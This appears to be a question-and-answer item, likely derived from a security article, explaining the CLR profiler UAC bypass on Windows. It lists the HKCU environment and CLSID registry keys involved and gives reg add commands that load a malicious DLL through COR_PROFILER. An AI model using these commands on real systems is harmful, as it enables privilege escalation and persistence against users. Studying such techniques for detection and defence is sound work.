What registry keys are modified for the CLR UAC bypass via environment variables, and how can they be set using the command line?

Two sets of registry keys are modified: under `HKCU\Environment` you set `COR_ENABLE_PROFILING=1` and `COR_PROFILER={CLSID}`; under `HKCU\Software\Classes\CLSID\{CLSID}\InprocServer32` you set the default value to the path of the malicious DLL. The article shows using `reg add` commands, e.g., `REG ADD "HKCU\Software\Classes\CLSID\{...}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f` and `REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{...}" /f`. Alternative methods like `wmic` or PowerShell are also described in the related articles on persistence.